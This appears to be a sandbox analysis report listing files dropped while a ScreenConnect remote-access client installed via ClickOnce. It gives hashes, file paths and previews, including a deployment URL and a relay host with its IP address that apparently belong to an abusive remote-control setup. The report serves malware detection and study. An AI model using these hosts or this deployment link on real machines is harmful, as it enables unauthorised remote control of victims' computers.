                                                                                                                                                                                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                                                                  Entropy (8bit):5.036650973187548
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOnO/ew/vXbAa3xT:2dL9hK6E46YPuvH
                                                                                                                                                                                                                                                  MD5:4E2841A7525E541608D9C989A050C2F5
                                                                                                                                                                                                                                                  SHA1:47D81D9E55B20DD0EDEE105874FF06CE3EB8C162
                                                                                                                                                                                                                                                  SHA-256:CB876304CFB6BBDC429A354523D987C5DC22FFE714D47D18D94040F240244ACD
                                                                                                                                                                                                                                                  SHA-512:8E62467BA1D47DFFFA590D1DA786A862C76D190D775C90C96550D883D498C56E6A0D5D889DD1D33BCD7970EF545DF1EA21103A8A1D6B712DF314763638D066FE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>popwee2.zapto.org=194.59.30.201-08%2f11%2f2024%2010%3a01%3a41</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):562
                                                                                                                                                                                                                                                  Entropy (8bit):5.036650973187548
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOnO/ew/vXbAa3xT:2dL9hK6E46YPuvH
                                                                                                                                                                                                                                                  MD5:4E2841A7525E541608D9C989A050C2F5
                                                                                                                                                                                                                                                  SHA1:47D81D9E55B20DD0EDEE105874FF06CE3EB8C162
                                                                                                                                                                                                                                                  SHA-256:CB876304CFB6BBDC429A354523D987C5DC22FFE714D47D18D94040F240244ACD
                                                                                                                                                                                                                                                  SHA-512:8E62467BA1D47DFFFA590D1DA786A862C76D190D775C90C96550D883D498C56E6A0D5D889DD1D33BCD7970EF545DF1EA21103A8A1D6B712DF314763638D066FE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>popwee2.zapto.org=194.59.30.201-08%2f11%2f2024%2010%3a01%3a41</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):68096
                                                                                                                                                                                                                                                  Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1373
                                                                                                                                                                                                                                                  Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                  MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                  SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                  SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                  SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                  Size (bytes):1662
                                                                                                                                                                                                                                                  Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                  MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                  SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                  SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                  SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):847
                                                                                                                                                                                                                                                  Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                  MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                  SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                  SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                  SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (625), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15036
                                                                                                                                                                                                                                                  Entropy (8bit):3.8088109369435084
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:84JqHzST41Ua+4JqHzSg714JqHzSjoII+43LEv:8FqKUtFR71F4oIRAA
                                                                                                                                                                                                                                                  MD5:7A9B9539BEF3F9AC1B7D821B2E2B5BB1
                                                                                                                                                                                                                                                  SHA1:DBF738FED3A374EC4D829A9962B034B785DAF19F
                                                                                                                                                                                                                                                  SHA-256:0814809D9E213F14DD0B5F0B2C208D2C1627475D3DECE91E9C69B2F1B3DB64F2
                                                                                                                                                                                                                                                  SHA-512:6A47177542635BA23C0B5E99D2D7FD02252817A23DD15E3645782FB0D554D688F0E4C9066626956E0AD575E3AB5BE68CFC28422E0352C31F477AC33D7FCC66A5
                                                                                                                                                                                                                                                  Malicious:false
Preview:
PLATFORM VERSION INFO
    Windows : 10.0.19045.0 (Win32NT)
    Common Language Runtime : 4.0.30319.42000
    System.Deployment.dll : 4.8.4270.0 built by: NET48REL1LAST_C
    clr.dll : 4.8.4515.0 built by: NET48REL1LAST_C
    dfdll.dll : 4.8.4270.0 built by: NET48REL1LAST_C
    dfshim.dll : 10.0.19041.30000 (WinBuild.160101.0800)
SOURCES
    Deployment url : https://voicemail-lakeleft.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):117980
                                                                                                                                                                                                                                                  Entropy (8bit):5.585720273564656
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:0aNIcT51/FXvMVNWfCXq9ymSm2o9HuzhJOvP:0FcfiVI8mt8vOvP
                                                                                                                                                                                                                                                  MD5:4E152D84C20AB6330FF0CF47A9AF7C6D
                                                                                                                                                                                                                                                  SHA1:018F32D833124056FCCFC200318542687D0E5565
                                                                                                                                                                                                                                                  SHA-256:5668723C31F6726947DFEDA324B26D27F7E899647C22A4B1B2BEA935BA8A6B10
                                                                                                                                                                                                                                                  SHA-512:2F3F6B397072B795C74C44F19012483E2785DDEE5A7F5D7E38C566EBC9A94AE084504061F697DB714B933B79824CBC6B08B7718536A19FA21D11AD8D0F8AFB79
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):197120
                                                                                                                                                                                                                                                  Entropy (8bit):6.58476728626163
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                                                                  MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                                                                  SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                                                                  SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                                                                  SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                  Entropy (8bit):5.147328807370198
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                                                                  MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                                                                  SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                                                                  SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                                                                  SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):68096
                                                                                                                                                                                                                                                  Entropy (8bit):6.068776675019683
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                                                                  MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                                                                  SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                                                                  SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                                                                  SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1636
                                                                                                                                                                                                                                                  Entropy (8bit):5.084538887646832
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                                                                  MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                                                                  SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                                                                  SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                                                                  SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):95520
                                                                                                                                                                                                                                                  Entropy (8bit):6.505346220942731
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                                                                  MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                                                                  SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                                                                  SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                                                                  SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):548864
                                                                                                                                                                                                                                                  Entropy (8bit):6.031251664661689
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                                                                  MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                                                                  SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                                                                  SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                                                                  SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1216
                                                                                                                                                                                                                                                  Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                                                                  MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                                                                  SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                                                                  SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                                                                  SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1721856
                                                                                                                                                                                                                                                  Entropy (8bit):6.639136400085158
                                                                                                                                                                                                                                                  Encrypted:false
